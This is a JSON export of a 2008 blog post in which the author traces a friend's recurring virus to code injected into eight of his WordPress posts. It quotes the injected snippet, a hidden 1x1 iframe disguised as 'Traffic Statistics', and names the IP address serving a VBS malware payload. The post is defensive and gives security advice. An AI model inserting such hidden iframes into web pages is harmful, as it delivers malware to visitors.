{"id":684,"date":"2008-05-02T11:56:01","date_gmt":"2008-05-02T18:56:01","guid":{"rendered":"http:\/\/www.pdxtc.com\/wpblog\/?p=684"},"modified":"2014-12-04T13:23:54","modified_gmt":"2014-12-04T20:23:54","slug":"virus-in-a-wordpress-post","status":"publish","type":"post","link":"https:\/\/www.pdxtc.com\/wpblog\/viruses-and-scams\/virus-in-a-wordpress-post\/","title":{"rendered":"Virus in a WordPress Post"},"content":{"rendered":"<p>I was at a friends home a couple of weeks ago, and he was complaining about a virus on his computer.  Try as he might, he could not get rid of this virus. I total look and thought I was able to remove it, but he said that the next day it came back.<\/p>\n<p>Ultimately he ended up having a local computer repair person come out, who cleaned up his system and a couple of hours and the problem went away., but today,we talked by phone, and he told me he got the warning again when he viewed his own blog.<\/p>\n<p>I took a look at his blog and here&#8217;s what I saw &#8211;<\/p>\n<p><a href=\"https:\/\/www.pdxtc.com\/wpblog\/wp-content\/uploads\/wp-virus-memo1.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-686\" title=\"wp-virus-memo1\" src=\"https:\/\/www.pdxtc.com\/wpblog\/wp-content\/uploads\/wp-virus-memo1.jpg\" alt=\"\" width=\"374\" height=\"294\" srcset=\"https:\/\/www.pdxtc.com\/wpblog\/wp-content\/uploads\/wp-virus-memo1.jpg 374w, https:\/\/www.pdxtc.com\/wpblog\/wp-content\/uploads\/wp-virus-memo1-300x235.jpg 300w\" sizes=\"(max-width: 374px) 100vw, 374px\" \/><\/a><\/p>\n<p>Interesting! I recognize the IP address from the file that I couldn&#8217;t seem to get rid of while I was visiting, so now we had our culprit. We knew where his virus came from&#8230; it came from his own WordPress blog!<\/p>\n<p>At that point I did little bit of research, and found a post on the WordPress support forum talking about this very issue, where it seemed that someone had inserted this code into one of someone else&#8217;s old posts.<\/p>\n<p>&lt;!&#8211; Traffic Statistics &#8211;&gt; &lt;iframe height=&#8221;1&#8243; width=&#8221;1&#8243; frameBorder=&#8221;0&#8243; src=&#8221;http:\/\/www.wp-stats-XXXphp.info\/iframe\/wp-stats.XXXphp&#8221;&gt;&lt;\/iframe&gt;&lt;!&#8211; End Traffic Statistics &#8211;&gt;<\/p>\n<p>At that point it was a matter of picking through all of his posts manually, and viewing the html code of each one, before finding and deleting it. Of course, in his case, <strong>it was found in 8 different posts! <\/strong>It was coming from  http:\/\/61.155.8.157\/iframe\/wp-stats.php and was a VBS Malware-gen<\/p>\n<p>Luckily he&#8217;s an infrequent poster, but can you imagine how difficult this may have been if there were multiple users posting everyday?<\/p>\n<p>The moral of the story? Moderate your new users, use a secure password, keep your WordPress current (his was not) and watch out for strange e-mail addresses signing up as new users!<\/p>\n","protected":false},"excerpt":{"rendered":"<p>I was at a friends home a couple of weeks ago, and he was complaining about a virus on his computer. Try as he might, he could not get rid of this virus. I total look and thought I was able to remove it, but he said that the next day it came back. Ultimately [&hellip;]<\/p>\n","protected":false},"author":76,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_et_pb_use_builder":"","_et_pb_old_content":"","_et_gb_content_width":"","footnotes":""},"categories":[12,30],"tags":[],"class_list":["post-684","post","type-post","status-publish","format-standard","hentry","category-viruses-and-scams","category-wordpress"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Virus in a Wordpress Post<\/title>\n<meta name=\"description\" content=\"I was at a friends home a couple of weeks ago, and he was complaining about a virus on his computer. Try as he might, he could not get rid of this virus.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.pdxtc.com\/wpblog\/viruses-and-scams\/virus-in-a-wordpress-post\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Virus in a Wordpress Post\" \/>\n<meta property=\"og:description\" content=\"I was at a friends home a couple of weeks ago, and he was complaining about a virus on his computer. Try as he might, he could not get rid of this virus.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.pdxtc.com\/wpblog\/viruses-and-scams\/virus-in-a-wordpress-post\/\" \/>\n<meta property=\"og:site_name\" content=\"Scott Hendison&#039;s Old Search Commander Blog\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/SearchCommander\" \/>\n<meta property=\"article:published_time\" content=\"2008-05-02T18:56:01+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2014-12-04T20:23:54+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.pdxtc.com\/wpblog\/wp-content\/uploads\/wp-virus-memo1.jpg\" \/>\n<meta name=\"author\" content=\"Scott\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@shendison\" \/>\n<meta name=\"twitter:site\" content=\"@shendison\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Scott\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.pdxtc.com\\\/wpblog\\\/viruses-and-scams\\\/virus-in-a-wordpress-post\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.pdxtc.com\\\/wpblog\\\/viruses-and-scams\\\/virus-in-a-wordpress-post\\\/\"},\"author\":{\"name\":\"Scott\",\"@id\":\"https:\\\/\\\/www.pdxtc.com\\\/wpblog\\\/#\\\/schema\\\/person\\\/3142c7d28dc676725ac62cd6c9de8371\"},\"headline\":\"Virus in a WordPress Post\",\"datePublished\":\"2008-05-02T18:56:01+00:00\",\"dateModified\":\"2014-12-04T20:23:54+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.pdxtc.com\\\/wpblog\\\/viruses-and-scams\\\/virus-in-a-wordpress-post\\\/\"},\"wordCount\":336,\"commentCount\":11,\"image\":{\"@id\":\"https:\\\/\\\/www.pdxtc.com\\\/wpblog\\\/viruses-and-scams\\\/virus-in-a-wordpress-post\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.pdxtc.com\\\/wpblog\\\/wp-content\\\/uploads\\\/wp-virus-memo1.jpg\",\"articleSection\":[\"Viruses and Scams\",\"Wordpress\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/www.pdxtc.com\\\/wpblog\\\/viruses-and-scams\\\/virus-in-a-wordpress-post\\\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.pdxtc.com\\\/wpblog\\\/viruses-and-scams\\\/virus-in-a-wordpress-post\\\/\",\"url\":\"https:\\\/\\\/www.pdxtc.com\\\/wpblog\\\/viruses-and-scams\\\/virus-in-a-wordpress-post\\\/\",\"name\":\"Virus in a Wordpress Post\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.pdxtc.com\\\/wpblog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.pdxtc.com\\\/wpblog\\\/viruses-and-scams\\\/virus-in-a-wordpress-post\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.pdxtc.com\\\/wpblog\\\/viruses-and-scams\\\/virus-in-a-wordpress-post\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.pdxtc.com\\\/wpblog\\\/wp-content\\\/uploads\\\/wp-virus-memo1.jpg\",\"datePublished\":\"2008-05-02T18:56:01+00:00\",\"dateModified\":\"2014-12-04T20:23:54+00:00\",\"author\":{\"@id\":\"https:\\\/\\\/www.pdxtc.com\\\/wpblog\\\/#\\\/schema\\\/person\\\/3142c7d28dc676725ac62cd6c9de8371\"},\"description\":\"I was at a friends home a couple of weeks ago, and he was complaining about a virus on his computer. Try as he might, he could not get rid of this virus.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.pdxtc.com\\\/wpblog\\\/viruses-and-scams\\\/virus-in-a-wordpress-post\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.pdxtc.com\\\/wpblog\\\/viruses-and-scams\\\/virus-in-a-wordpress-post\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.pdxtc.com\\\/wpblog\\\/viruses-and-scams\\\/virus-in-a-wordpress-post\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.pdxtc.com\\\/wpblog\\\/wp-content\\\/uploads\\\/wp-virus-memo1.jpg\",\"contentUrl\":\"https:\\\/\\\/www.pdxtc.com\\\/wpblog\\\/wp-content\\\/uploads\\\/wp-virus-memo1.jpg\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.pdxtc.com\\\/wpblog\\\/viruses-and-scams\\\/virus-in-a-wordpress-post\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.pdxtc.com\\\/wpblog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Virus in a WordPress Post\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.pdxtc.com\\\/wpblog\\\/#website\",\"url\":\"https:\\\/\\\/www.pdxtc.com\\\/wpblog\\\/\",\"name\":\"Scott Hendison&#039;s Old Search Commander Blog\",\"description\":\"\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.pdxtc.com\\\/wpblog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.pdxtc.com\\\/wpblog\\\/#\\\/schema\\\/person\\\/3142c7d28dc676725ac62cd6c9de8371\",\"name\":\"Scott\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/ba275e23c0aad37526141e715b54cd3eeac27b071e4395b2b39e801ca68355d6?s=96&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/ba275e23c0aad37526141e715b54cd3eeac27b071e4395b2b39e801ca68355d6?s=96&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/ba275e23c0aad37526141e715b54cd3eeac27b071e4395b2b39e801ca68355d6?s=96&r=g\",\"caption\":\"Scott\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/shendison\"]}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Virus in a Wordpress Post","description":"I was at a friends home a couple of weeks ago, and he was complaining about a virus on his computer. Try as he might, he could not get rid of this virus.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.pdxtc.com\/wpblog\/viruses-and-scams\/virus-in-a-wordpress-post\/","og_locale":"en_US","og_type":"article","og_title":"Virus in a Wordpress Post","og_description":"I was at a friends home a couple of weeks ago, and he was complaining about a virus on his computer. Try as he might, he could not get rid of this virus.","og_url":"https:\/\/www.pdxtc.com\/wpblog\/viruses-and-scams\/virus-in-a-wordpress-post\/","og_site_name":"Scott Hendison&#039;s Old Search Commander Blog","article_publisher":"https:\/\/www.facebook.com\/SearchCommander","article_published_time":"2008-05-02T18:56:01+00:00","article_modified_time":"2014-12-04T20:23:54+00:00","og_image":[{"url":"https:\/\/www.pdxtc.com\/wpblog\/wp-content\/uploads\/wp-virus-memo1.jpg","type":"","width":"","height":""}],"author":"Scott","twitter_card":"summary_large_image","twitter_creator":"@shendison","twitter_site":"@shendison","twitter_misc":{"Written by":"Scott","Est. reading time":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.pdxtc.com\/wpblog\/viruses-and-scams\/virus-in-a-wordpress-post\/#article","isPartOf":{"@id":"https:\/\/www.pdxtc.com\/wpblog\/viruses-and-scams\/virus-in-a-wordpress-post\/"},"author":{"name":"Scott","@id":"https:\/\/www.pdxtc.com\/wpblog\/#\/schema\/person\/3142c7d28dc676725ac62cd6c9de8371"},"headline":"Virus in a WordPress Post","datePublished":"2008-05-02T18:56:01+00:00","dateModified":"2014-12-04T20:23:54+00:00","mainEntityOfPage":{"@id":"https:\/\/www.pdxtc.com\/wpblog\/viruses-and-scams\/virus-in-a-wordpress-post\/"},"wordCount":336,"commentCount":11,"image":{"@id":"https:\/\/www.pdxtc.com\/wpblog\/viruses-and-scams\/virus-in-a-wordpress-post\/#primaryimage"},"thumbnailUrl":"https:\/\/www.pdxtc.com\/wpblog\/wp-content\/uploads\/wp-virus-memo1.jpg","articleSection":["Viruses and Scams","Wordpress"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/www.pdxtc.com\/wpblog\/viruses-and-scams\/virus-in-a-wordpress-post\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/www.pdxtc.com\/wpblog\/viruses-and-scams\/virus-in-a-wordpress-post\/","url":"https:\/\/www.pdxtc.com\/wpblog\/viruses-and-scams\/virus-in-a-wordpress-post\/","name":"Virus in a Wordpress Post","isPartOf":{"@id":"https:\/\/www.pdxtc.com\/wpblog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.pdxtc.com\/wpblog\/viruses-and-scams\/virus-in-a-wordpress-post\/#primaryimage"},"image":{"@id":"https:\/\/www.pdxtc.com\/wpblog\/viruses-and-scams\/virus-in-a-wordpress-post\/#primaryimage"},"thumbnailUrl":"https:\/\/www.pdxtc.com\/wpblog\/wp-content\/uploads\/wp-virus-memo1.jpg","datePublished":"2008-05-02T18:56:01+00:00","dateModified":"2014-12-04T20:23:54+00:00","author":{"@id":"https:\/\/www.pdxtc.com\/wpblog\/#\/schema\/person\/3142c7d28dc676725ac62cd6c9de8371"},"description":"I was at a friends home a couple of weeks ago, and he was complaining about a virus on his computer. Try as he might, he could not get rid of this virus.","breadcrumb":{"@id":"https:\/\/www.pdxtc.com\/wpblog\/viruses-and-scams\/virus-in-a-wordpress-post\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.pdxtc.com\/wpblog\/viruses-and-scams\/virus-in-a-wordpress-post\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.pdxtc.com\/wpblog\/viruses-and-scams\/virus-in-a-wordpress-post\/#primaryimage","url":"https:\/\/www.pdxtc.com\/wpblog\/wp-content\/uploads\/wp-virus-memo1.jpg","contentUrl":"https:\/\/www.pdxtc.com\/wpblog\/wp-content\/uploads\/wp-virus-memo1.jpg"},{"@type":"BreadcrumbList","@id":"https:\/\/www.pdxtc.com\/wpblog\/viruses-and-scams\/virus-in-a-wordpress-post\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.pdxtc.com\/wpblog\/"},{"@type":"ListItem","position":2,"name":"Virus in a WordPress Post"}]},{"@type":"WebSite","@id":"https:\/\/www.pdxtc.com\/wpblog\/#website","url":"https:\/\/www.pdxtc.com\/wpblog\/","name":"Scott Hendison&#039;s Old Search Commander Blog","description":"","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.pdxtc.com\/wpblog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Person","@id":"https:\/\/www.pdxtc.com\/wpblog\/#\/schema\/person\/3142c7d28dc676725ac62cd6c9de8371","name":"Scott","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/ba275e23c0aad37526141e715b54cd3eeac27b071e4395b2b39e801ca68355d6?s=96&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/ba275e23c0aad37526141e715b54cd3eeac27b071e4395b2b39e801ca68355d6?s=96&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/ba275e23c0aad37526141e715b54cd3eeac27b071e4395b2b39e801ca68355d6?s=96&r=g","caption":"Scott"},"sameAs":["https:\/\/x.com\/shendison"]}]}},"_links":{"self":[{"href":"https:\/\/www.pdxtc.com\/wpblog\/wp-json\/wp\/v2\/posts\/684","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.pdxtc.com\/wpblog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.pdxtc.com\/wpblog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.pdxtc.com\/wpblog\/wp-json\/wp\/v2\/users\/76"}],"replies":[{"embeddable":true,"href":"https:\/\/www.pdxtc.com\/wpblog\/wp-json\/wp\/v2\/comments?post=684"}],"version-history":[{"count":0,"href":"https:\/\/www.pdxtc.com\/wpblog\/wp-json\/wp\/v2\/posts\/684\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.pdxtc.com\/wpblog\/wp-json\/wp\/v2\/media?parent=684"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.pdxtc.com\/wpblog\/wp-json\/wp\/v2\/categories?post=684"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.pdxtc.com\/wpblog\/wp-json\/wp\/v2\/tags?post=684"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}